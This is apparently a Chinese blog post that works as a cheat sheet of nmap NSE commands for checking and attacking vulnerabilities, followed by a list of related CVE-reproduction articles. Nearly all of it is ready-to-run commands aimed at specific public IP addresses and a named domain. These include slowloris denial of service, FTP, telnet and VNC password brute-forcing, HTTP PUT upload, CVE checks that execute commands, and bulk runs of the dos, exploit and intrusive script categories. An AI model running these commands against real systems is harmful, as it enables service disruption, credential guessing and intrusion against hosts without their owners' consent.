使用nmap验证多种漏洞

简介: 使用nmap验证多种漏洞

1、http 拒绝服务
nmap --max-parallelism 800--script http-slowloris scanme.nmap.org

2、IIS 短文件泄露
nmap -p 8080 --script http-iis-short-name-brute 61.142.64.176

3、ftp弱口令暴力破解
nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153

4、检测CVE-2011-2523中的ftp-vsftpd-backdoor
nmap -T2 --script ftp-vsftpd-backdoor 211.139.201.240
5、验证http中开启的-methods 方法
nmap -T3 --script http-methods --script-args http.test-all=true,http.url-path=/www.haoshangjia.com
6、验证HTTP.sys 远程代码执行
nmap -sV --script http-vuln-cve2015-1635 203.195.139.153

7、验证 SSL POODLE information leak
nmap -sV -p 443 --version-light --script ssl-poodle 218.19.141.16

8、验证http 中开启了put 方法
nmap --script http-put --script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16
9、验证mysql 匿名访问
nmap --script mysql-empty-password 203.195.139.153

10、验证cve2015-1427 漏洞
nmap --script http-vuln-cve2015-1427 --script-args command=ls 203.195.139.153
11、验证cve2014-8877漏洞
nmap -Pn --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128
12、验证Cisco ASA中的CVE-2014-2126,CVE-2014-2127,CVE-2014-21,CVE-2014-2129漏洞
nmap -p 443 --script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153
13、验证低安全的 SSHv1,sslv2协议
nmap --script sshv1,sslv2 www.haoshangjia.com
14、 验证CVE-2014-0224 ssl-ccs-injection
nmap -Pn --script ssl-ccs-injection 203.195.139.153
15 、验证ssl-cert证书问题
nmap -v -v --script ssl-cert 203.195.139.153
16、验证SSL证书的有限期
nmap -Pn --script ssl-date www.haoshangjia.com
17、验证CVE-2014-0160 OpenSSL Heartbleed bug
nmap -p 443 --script ssl-heartbleed,ssl-known-key 203.195.139.153
18、验证 Debian OpenSSL keys
nmap -p 443 --script ssl-known-key 203.195.139.153
19、 验证弱加密SSL套件
nmap --script ssl-enum-ciphers 203.195.139.153

20、验证CVE 2015-4000
nmap --script ssl-dh-params www.haoshangjia.com
21、验证多种SSL漏洞问题
nmap 203.195.139.153 --vv --script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2
22、在网络中检测某主机是否存在窃听他人流量
nmap --script sniffer-detect 10.10.167.5
23、暴力破解telnet
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst --script-args telnet-brute.timeout=8s 203.195.139.153
24、验证telnet是否支持加密
nmap --script telnet-encryption 203.195.139.153
25、精准地确认端口上运行的服务
nmap -sV --script unusual-port 42.96.170.128

26、收集VNC信息
nmap --script vnc-info 203.195.139.153
27、暴力破解VNC
nmap --script vnc-brute --script-args brute.guesses=6,brute.emptypass=true,userdb=/root/dictionary/user.txt,brute.useraspass=true,passdb=/root/dictionary/pass.txt,brute.retries=3,brute.threads=2,brute.delay=3 42.96.170.128

使用系列的nmap NSE 进行检查

nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式进行比较笼统的扫描:

auth: 负责处理鉴权证书(绕开鉴权)的脚本
broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务
brute: 提供暴力破解方式,针对常见的应用如http/snmp等
default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力
discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等
dos: 用于进行拒绝服务攻击
exploit: 利用已知的漏洞入侵系统
external: 利用第三方的数据库或资源,例如进行whois解析
fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞
intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
malware: 探测目标机是否感染了病毒、开启了后门等信息
safe: 此类与intrusive相反,属于安全性脚本
version: 负责增强服务与版本扫描(Version Detection)功能的脚本

vuln: 负责检查目标机是否有常见的漏洞(Vulnerability)

Nmap提供的脚本命令行参数如下:
-sC: 等价于--script=default,使用默认类别的脚本进行扫描。
--script=: 使用某个或某类脚本进行扫描,支持通配符描述
--script-args=: 为脚本提供默认参数
--script-args-file=filename: 使用文件来为脚本提供参数
--script-trace: 显示脚本执行过程中发送与接收的数据
--script-updatedb: 更新脚本数据库

--script-help=: 显示脚本的帮助信息,其中部分可以逗号分隔的文件或脚本类别。

1、使用nmap对某主机进行一系列的证书鉴权检查
nmap --script auth 203.195.139.153
2、使用nmap在局域网内探查更多服务开启情况
nmap --script broadcast 10.10.167.6
3、使用nmap 对常见的服务进行暴力破解
nmap --script brute 203.195.139.153
4、使用nmap 进行基本的扫描
nmap --script default 203.195.139.153

nmap --sC 203.195.139.153

5、使用nmap 进行信息挖掘
nmap --script discovery 203.195.139.153
6、使用nmap 进行拒绝服务攻击
nmap --script dos 203.195.139.153
7、使用nmap 利用已知的漏洞入侵系统
nmap --script exploit 203.195.139.153
8、使用nmap 进行利用第三方的数据库或资源进行信息收集或者攻击
nmap --script external 203.195.139.153
9、使用nmap 进行模糊测试,发送异常的包到目标机,探测出潜在漏洞
nmap --script fuzzer 203.195.139.153
10、使用nmap 进行入侵,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
nmap --script intrusive 203.195.139.153
11、使用nmap 探测目标机是否感染了病毒、开启了后门等信息
nmap --script malware 203.195.139.153
12、使用nmap 对系统进行安全检查
nmap --script safe 203.195.139.153
13、使用nmap 对目标机进行检查是否存在常见的漏洞
nmap --script vuln 203.195.139.153
14、使用nmap 负责增强服务与版本扫描(Version Detection)功能的脚本
nmap --script version 203.195.139.153

相关文章
|
存储 监控 安全
Zabbix登录绕过漏洞复现(CVE-2022-23131)
最近在复现zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。
1598 0
Zabbix登录绕过漏洞复现(CVE-2022-23131)
|
2月前
|
安全 Shell Windows
Metasploit -- CVE-2019-0708漏洞检测及利用
Metasploit -- CVE-2019-0708漏洞检测及利用
11 0
|
11月前
|
安全 Unix Linux
CVE-2020-15778 Openssh命令注入漏洞复现
scp是用于在计算机之间复制文件的程序。它使用SSH协议。在大多数Linux和Unix发行版中默认都包含它。
1040 0
|
11月前
|
开发框架 安全 Oracle
|
安全 Windows
CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
1460 0